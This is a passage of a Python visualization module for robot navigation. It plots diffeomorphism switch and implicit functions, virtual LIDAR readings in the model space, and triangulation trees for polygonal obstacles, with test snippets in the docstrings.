res3 = TempPositionTransformedD[0][0]*PositionTransformedDD[2] + TempPositionTransformedD[0][1]*PositionTransformedDD[6] + PositionTransformedD[0][1]*(TempPositionTransformedDD[0]*PositionTransformedD[0][0] + TempPositionTransformedDD[1]*PositionTransformedD[1][0]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[2]*PositionTransformedD[0][0] + TempPositionTransformedDD[3]*PositionTransformedD[1][0])
res4 = TempPositionTransformedD[0][0]*PositionTransformedDD[3] + TempPositionTransformedD[0][1]*PositionTransformedDD[7] + PositionTransformedD[0][1]*(TempPositionTransformedDD[0]*PositionTransformedD[0][1] + TempPositionTransformedDD[1]*PositionTransformedD[1][1]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[2]*PositionTransformedD[0][1] + TempPositionTransformedDD[3]*PositionTransformedD[1][1])
res5 = TempPositionTransformedD[1][0]*PositionTransformedDD[0] + TempPositionTransformedD[1][1]*PositionTransformedDD[4] + PositionTransformedD[0][0]*(TempPositionTransformedDD[4]*PositionTransformedD[0][0] + TempPositionTransformedDD[5]*PositionTransformedD[1][0]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[6]*PositionTransformedD[0][0] + TempPositionTransformedDD[7]*PositionTransformedD[1][0])
res6 = TempPositionTransformedD[1][0]*PositionTransformedDD[1] + TempPositionTransformedD[1][1]*PositionTransformedDD[5] + PositionTransformedD[0][0]*(TempPositionTransformedDD[4]*PositionTransformedD[0][1] + TempPositionTransformedDD[5]*PositionTransformedD[1][1]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[6]*PositionTransformedD[0][1] + TempPositionTransformedDD[7]*PositionTransformedD[1][1])
res7 = TempPositionTransformedD[1][0]*PositionTransformedDD[2] + TempPositionTransformedD[1][1]*PositionTransformedDD[6] + PositionTransformedD[0][1]*(TempPositionTransformedDD[4]*PositionTransformedD[0][0] + TempPositionTransformedDD[5]*PositionTransformedD[1][0]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[6]*PositionTransformedD[0][0] + TempPositionTransformedDD[7]*PositionTransformedD[1][0])
res8 = TempPositionTransformedD[1][0]*PositionTransformedDD[3] + TempPositionTransformedD[1][1]*PositionTransformedDD[7] + PositionTransformedD[0][1]*(TempPositionTransformedDD[4]*PositionTransformedD[0][1] + TempPositionTransformedDD[5]*PositionTransformedD[1][1]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[6]*PositionTransformedD[0][1] + TempPositionTransformedDD[7]*PositionTransformedD[1][1])
PositionTransformedDD[0] = res1
PositionTransformedDD[1] = res2
PositionTransformedDD[2] = res3
PositionTransformedDD[3] = res4
PositionTransformedDD[4] = res5
PositionTransformedDD[5] = res6
PositionTransformedDD[6] = res7
PositionTransformedDD[7] = res8
PositionTransformedD = numpy.matmul(TempPositionTransformedD, PositionTransformedD)
PositionTransformed = TempPositionTransformed
GoalTransformed = TempGoalTransformed
# Add the data point
data_points[j][i] = numpy.linalg.norm(PositionTransformed[0]-GoalTransformed[0])
# Plot the result
plt.imshow(data_points, vmin=data_points[~numpy.isnan(data_points)].min(), vmax=data_points[~numpy.isnan(data_points)].max(), origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
plt.colorbar()
plt.show()
return
def visualize_diffeoSwitch_triangulation(PolygonVertices, PlotBounds, NumPoints, TriangleNum, DiffeoParams):
"""
Function that visualizes the switch function corresponding to a given polygon and a given triangle number in the tree
Input:
1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
2) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
3) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
4) TriangleNum: Number of triangle for which to visualize the switch function
5) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
bounds = numpy.array([0, 5, -3, 3])
num_points = numpy.array([101, 101])
triangle_num = 0
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.5
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.5
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_diffeoSwitch_triangulation(xy, bounds, num_points, triangle_num, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Find the tree
tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
# Generate x and y coordinates
x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
# Span all the points
data_points = numpy.zeros((y_coords.shape[0],x_coords.shape[0]))
for j in range(y_coords.shape[0]):
for i in range(x_coords.shape[0]):
candidate_point = numpy.array([[x_coords[i],y_coords[j]]])
# Find the value of the implicit function
sigma, sigmad, sigmadd = triangleSwitch(candidate_point, tree[TriangleNum], DiffeoParams)
if sigma == 0. or sigma > 1:
data_points[j][i] = numpy.nan
continue
else:
# Add the data point
data_points[j][i] = sigma
print(i+j*y_coords.shape[0])
# Plot the result
plt.imshow(data_points, vmin=data_points[~numpy.isnan(data_points)].min(), vmax=1, origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
plt.axis('off')
plt.colorbar()
plt.show()
return
def visualize_diffeoSwitch_convex(PolygonVertices, PlotBounds, NumPoints, PolygonNum, DiffeoParams):
"""
Function that visualizes the switch function corresponding to a given polygon and a given polygon number in the convex decomposition tree
Input:
1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
2) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
3) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
4) PolygonNum: Number of polygon for which to visualize the switch function
5) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
bounds = numpy.array([0, 5, -3, 3])
num_points = numpy.array([101, 101])
polygon_num = 0
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.5
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.5
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_diffeoSwitch_convex(xy, bounds, num_points, polygon_num, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Find the tree
tree = diffeoTreeConvex(PolygonVertices, DiffeoParams)
# Generate x and y coordinates
x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
# Span all the points
data_points = numpy.zeros((y_coords.shape[0],x_coords.shape[0]))
for j in range(y_coords.shape[0]):
for i in range(x_coords.shape[0]):
candidate_point = numpy.array([[x_coords[i],y_coords[j]]])
# Find the value of the implicit function
sigma, sigmad, sigmadd = polygonSwitch(candidate_point, tree[PolygonNum], DiffeoParams)
if sigma == 0. or sigma > 1:
data_points[j][i] = numpy.nan
continue
else:
# Add the data point
data_points[j][i] = sigma
print(i+j*y_coords.shape[0])
# Plot the result
plt.imshow(data_points, vmin=data_points[~numpy.isnan(data_points)].min(), vmax=1, origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
plt.axis('off')
plt.colorbar()
plt.show()
return
def visualize_implicit(PolygonVertices, PlotBounds, NumPoints, DiffeoParams):
"""
Function that visualizes the implicit function corresponding to a given polygon
Input:
1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
2) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
3) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
4) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
bounds = numpy.array([0, 5, -3, 3])
num_points = numpy.array([101, 101])
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.5
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.5
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_implicit(xy, bounds, num_points, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Find the tree
tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
# Generate x and y coordinates
x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
# Span all the points
data_points = numpy.zeros((y_coords.shape[0],x_coords.shape[0]))
current_counter = 0
time_now = time.time()
for j in range(y_coords.shape[0]):
for i in range(x_coords.shape[0]):
candidate_point = numpy.array([[x_coords[i],y_coords[j]]])
# Find the value of the implicit function
beta, betad, betadd = polygonImplicit(candidate_point, tree, DiffeoParams)
if beta < 0:
data_points[j][i] = numpy.nan
continue
else:
# Add the data point
data_points[j][i] = beta
if i+j*y_coords.shape[0] - current_counter >= 100:
print([i+j*y_coords.shape[0],(time.time()-time_now)/100])
current_counter = i+j*y_coords.shape[0]
time_now = time.time()
# Plot the result
plt.imshow(data_points, vmin=data_points[~numpy.isnan(data_points)].min(), vmax=data_points[~numpy.isnan(data_points)].max(), origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
plt.axis('off')
plt.colorbar()
plt.show()
return
def visualize_virtualLIDAR(Polygons, RobotState, RobotRadius, DiffeoParams):
"""
Function that plots the robot, the obstacles and the LIDAR in the model space
Input:
1) Polygons: Vertex Coordinates of input polygons - M-member list of Nx2 numpy.array objects (start and end vertices must be the same)
2) RobotState: State of the robot in the physical space - 3-member numpy.array (x, y, theta)
3) RobotRadius: Robot radius (m)
4) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
robot_state = numpy.array([0, 0, 0])
robot_radius = 0.25
polygon_list = []
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
polygon_list.append(xy)
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.0
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.0
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_virtualLIDAR(polygon_list, robot_state, robot_radius, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Construct list of polygonal objects and enlarge by robot radius
polygon_list = []
for i in range(len(Polygons)):
polygon_list.append(Polygon(Polygons[i]).buffer(RobotRadius, join_style=2))
# Span all the found polygons to check for intersections between the known polygons and keep only the merged polygons
polygon_list_merged = []
i = 0
while (i<len(polygon_list)):
polygon_list_merged.append(polygon_list[i])
j = i+1
while (j<len(polygon_list)):
if polygon_list_merged[i].intersects(polygon_list[j]):
polygon_list_merged[i] = polygon_list_merged[i].union(polygon_list[j])
polygon_list_merged[i] = polygon_list_merged[i].simplify(0.08, preserve_topology=True) # simplify polygon to eliminate strange small corners
del(polygon_list[j])
else:
j = j+1
polygon_list_merged[i] = sp.geometry.polygon.orient(polygon_list_merged[i], 1.0) # orient polygon to be CCW
i = i+1
PolygonList = polygon_list_merged
# Register robot state
RobotPositionX = RobotState[0]
RobotPositionY = RobotState[1]
RobotOrientation = RobotState[2]
RobotPosition = numpy.array([RobotPositionX, RobotPositionY])
# Create fake LIDAR with range measurements
NumSample = 101
MinAngle = -2.35
MaxAngle = 2.35
Range = 4
Infinity = 20
Resolution = (MaxAngle - MinAngle)/(NumSample-1)
R = Range*numpy.ones(NumSample)
LIDAR = LIDARClass(R, Range, Infinity, MinAngle, MaxAngle, Resolution)
# Complete LIDAR readings
LIDAR = completeLIDAR2D(LIDAR)
# Set the LIDAR rays that hit known obstacles to the LIDAR range
for i in range(len(PolygonList)):
LIDAR = compensateObstacleLIDAR2D(RobotState, PolygonList[i], LIDAR)
# Construct list of diffeo trees for all objects
DiffeoTreeArray = []
for i in range(len(polygon_list_merged)):
coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0],polygon_list_merged[i].exterior.coords.xy[1])).transpose()
DiffeoTreeArray.append(diffeoTreeTriangulation(coords, DiffeoParams))
# Find list of polygon objects in the model layer based on the known obstacles
KnownObstaclesModel = []
for i in range(len(DiffeoTreeArray)):
theta = numpy.linspace(-numpy.pi, numpy.pi, 15)
x_coords = DiffeoTreeArray[i][-1]['center'][0][0] + DiffeoTreeArray[i][-1]['radius']*numpy.cos(theta)
y_coords = DiffeoTreeArray[i][-1]['center'][0][1] + DiffeoTreeArray[i][-1]['radius']*numpy.sin(theta)
model_disk_coords = numpy.vstack((x_coords,y_coords)).transpose()
KnownObstaclesModel.append(sp.geometry.polygon.orient(Polygon(model_disk_coords), 1.0))
# Find the diffeomorphism and its jacobian at the robot position, along with the necessary second derivatives
RobotPositionTransformed = numpy.array([RobotPosition])
RobotPositionTransformedD = numpy.eye(2)
RobotPositionTransformedDD = numpy.zeros(8)
for i in range(len(DiffeoTreeArray)):
TempPositionTransformed, TempPositionTransformedD, TempPositionTransformedDD = polygonDiffeoTriangulation(RobotPositionTransformed, DiffeoTreeArray[i], DiffeoParams)
res1 = TempPositionTransformedD[0][0]*RobotPositionTransformedDD[0] + TempPositionTransformedD[0][1]*RobotPositionTransformedDD[4] + RobotPositionTransformedD[0][0]*(TempPositionTransformedDD[0]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[1]*RobotPositionTransformedD[1][0]) + RobotPositionTransformedD[1][0]*(TempPositionTransformedDD[2]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[3]*RobotPositionTransformedD[1][0])
res2 = TempPositionTransformedD[0][0]*RobotPositionTransformedDD[1] + TempPositionTransformedD[0][1]*RobotPositionTransformedDD[5] + RobotPositionTransformedD[0][0]*(TempPositionTransformedDD[0]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[1]*RobotPositionTransformedD[1][1]) + RobotPositionTransformedD[1][0]*(TempPositionTransformedDD[2]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[3]*RobotPositionTransformedD[1][1])
res3 = TempPositionTransformedD[0][0]*RobotPositionTransformedDD[2] + TempPositionTransformedD[0][1]*RobotPositionTransformedDD[6] + RobotPositionTransformedD[0][1]*(TempPositionTransformedDD[0]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[1]*RobotPositionTransformedD[1][0]) + RobotPositionTransformedD[1][1]*(TempPositionTransformedDD[2]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[3]*RobotPositionTransformedD[1][0])
res4 = TempPositionTransformedD[0][0]*RobotPositionTransformedDD[3] + TempPositionTransformedD[0][1]*RobotPositionTransformedDD[7] + RobotPositionTransformedD[0][1]*(TempPositionTransformedDD[0]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[1]*RobotPositionTransformedD[1][1]) + RobotPositionTransformedD[1][1]*(TempPositionTransformedDD[2]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[3]*RobotPositionTransformedD[1][1])
res5 = TempPositionTransformedD[1][0]*RobotPositionTransformedDD[0] + TempPositionTransformedD[1][1]*RobotPositionTransformedDD[4] + RobotPositionTransformedD[0][0]*(TempPositionTransformedDD[4]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[5]*RobotPositionTransformedD[1][0]) + RobotPositionTransformedD[1][0]*(TempPositionTransformedDD[6]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[7]*RobotPositionTransformedD[1][0])
res6 = TempPositionTransformedD[1][0]*RobotPositionTransformedDD[1] + TempPositionTransformedD[1][1]*RobotPositionTransformedDD[5] + RobotPositionTransformedD[0][0]*(TempPositionTransformedDD[4]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[5]*RobotPositionTransformedD[1][1]) + RobotPositionTransformedD[1][0]*(TempPositionTransformedDD[6]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[7]*RobotPositionTransformedD[1][1])
res7 = TempPositionTransformedD[1][0]*RobotPositionTransformedDD[2] + TempPositionTransformedD[1][1]*RobotPositionTransformedDD[6] + RobotPositionTransformedD[0][1]*(TempPositionTransformedDD[4]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[5]*RobotPositionTransformedD[1][0]) + RobotPositionTransformedD[1][1]*(TempPositionTransformedDD[6]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[7]*RobotPositionTransformedD[1][0])
res8 = TempPositionTransformedD[1][0]*RobotPositionTransformedDD[3] + TempPositionTransformedD[1][1]*RobotPositionTransformedDD[7] + RobotPositionTransformedD[0][1]*(TempPositionTransformedDD[4]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[5]*RobotPositionTransformedD[1][1]) + RobotPositionTransformedD[1][1]*(TempPositionTransformedDD[6]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[7]*RobotPositionTransformedD[1][1])
RobotPositionTransformedDD[0] = res1
RobotPositionTransformedDD[1] = res2
RobotPositionTransformedDD[2] = res3
RobotPositionTransformedDD[3] = res4
RobotPositionTransformedDD[4] = res5
RobotPositionTransformedDD[5] = res6
RobotPositionTransformedDD[6] = res7
RobotPositionTransformedDD[7] = res8
RobotPositionTransformedD = numpy.matmul(TempPositionTransformedD, RobotPositionTransformedD)
RobotPositionTransformed = TempPositionTransformed
# Find transformed robot orientation
RobotOrientationTransformed = numpy.arctan2(RobotPositionTransformedD[1][0]*numpy.cos(RobotOrientation)+RobotPositionTransformedD[1][1]*numpy.sin(RobotOrientation), RobotPositionTransformedD[0][0]*numpy.cos(RobotOrientation)+RobotPositionTransformedD[0][1]*numpy.sin(RobotOrientation))
# Find transformed robot state
RobotStateTransformed = numpy.array([RobotPositionTransformed[0][0],RobotPositionTransformed[0][1],RobotOrientationTransformed])
# Read LIDAR data in the model space to account for the known obstacles
LIDARmodel = readLIDAR2D(RobotStateTransformed, KnownObstaclesModel, LIDAR.Range-numpy.linalg.norm(RobotPositionTransformed-RobotPosition), LIDAR.MinAngle, LIDAR.MaxAngle, LIDAR.NumSample)
# Find local freespace; the robot radius can be zero because we have already dilated the obstacles
LF_model = localfreespaceLIDAR2D(RobotStateTransformed, 0.0, LIDARmodel)
# Plot LIDAR points
fig, ax = plt.subplots()
fig.set_tight_layout(True)
lidar_plot, = ax.plot(RobotPositionTransformed[0][0] + LIDARmodel.RangeMeasurements*numpy.cos(LIDARmodel.Angle+RobotOrientationTransformed), RobotPositionTransformed[0][1] + LIDARmodel.RangeMeasurements*numpy.sin(LIDARmodel.Angle+RobotOrientationTransformed), '.r')
ax.set_aspect('equal', 'box')
# Plot all polygons in the physical space
for i in range(len(polygon_list_merged)):
coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0],polygon_list_merged[i].exterior.coords.xy[1])).transpose()
pgon = plt.Polygon(coords)
pgon.set_color('c')
ax.add_patch(pgon)
# Plot all transformed polygons
for i in range(len(KnownObstaclesModel)):
coords = numpy.vstack((KnownObstaclesModel[i].exterior.coords.xy[0],KnownObstaclesModel[i].exterior.coords.xy[1])).transpose()
pgon = plt.Polygon(coords, alpha=0.3)
ax.add_patch(pgon)
# Robot polygon points
bottom_left_point = numpy.array([[-0.25,-0.125]])
bottom_right_point = numpy.array([[0.25,-0.125]])
top_right_point = numpy.array([[0.25,0.125]])
top_left_point = numpy.array([[-0.25,0.125]])
# Plot the robot in the physical space
RotMat = numpy.array([[numpy.cos(RobotOrientation), -numpy.sin(RobotOrientation)], [numpy.sin(RobotOrientation), numpy.cos(RobotOrientation)]])
bottom_left_point_physical = numpy.dot(RotMat, bottom_left_point.transpose()).transpose()
bottom_right_point_physical = numpy.dot(RotMat, bottom_right_point.transpose()).transpose()
top_right_point_physical = numpy.dot(RotMat, top_right_point.transpose()).transpose()
top_left_point_physical = numpy.dot(RotMat, top_left_point.transpose()).transpose()
robot_polygon_physical = numpy.array([bottom_left_point_physical[0], bottom_right_point_physical[0], top_right_point_physical[0], top_left_point_physical[0], bottom_left_point_physical[0]]) + RobotPosition
pgon = plt.Polygon(robot_polygon_physical, alpha=0.5)
pgon.set_color('r')
ax.add_patch(pgon)
# Plot the robot in the model space
RotMatTransformed = numpy.array([[numpy.cos(RobotOrientationTransformed), -numpy.sin(RobotOrientationTransformed)], [numpy.sin(RobotOrientationTransformed), numpy.cos(RobotOrientationTransformed)]])
bottom_left_point_transformed = numpy.dot(RotMatTransformed, bottom_left_point.transpose()).transpose()
bottom_right_point_transformed = numpy.dot(RotMatTransformed, bottom_right_point.transpose()).transpose()
top_right_point_transformed = numpy.dot(RotMatTransformed, top_right_point.transpose()).transpose()
top_left_point_transformed = numpy.dot(RotMatTransformed, top_left_point.transpose()).transpose()
robot_polygon_model = numpy.array([bottom_left_point_transformed[0], bottom_right_point_transformed[0], top_right_point_transformed[0], top_left_point_transformed[0], bottom_left_point_transformed[0]]) + RobotPositionTransformed
pgon = plt.Polygon(robot_polygon_model)
ax.add_patch(pgon)
# Plot the local freespace in the model space
pgon = plt.Polygon(LF_model, alpha=0.3)
pgon.set_color('g')
ax.add_patch(pgon)
plt.show()
return
def visualize_tree_triangulation(PolygonVertices, DiffeoParams):
"""
Function that plots the generated tree to be used in the diffeomorphism (based on the ear clipping method)
Input:
1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
2) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.0
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.0
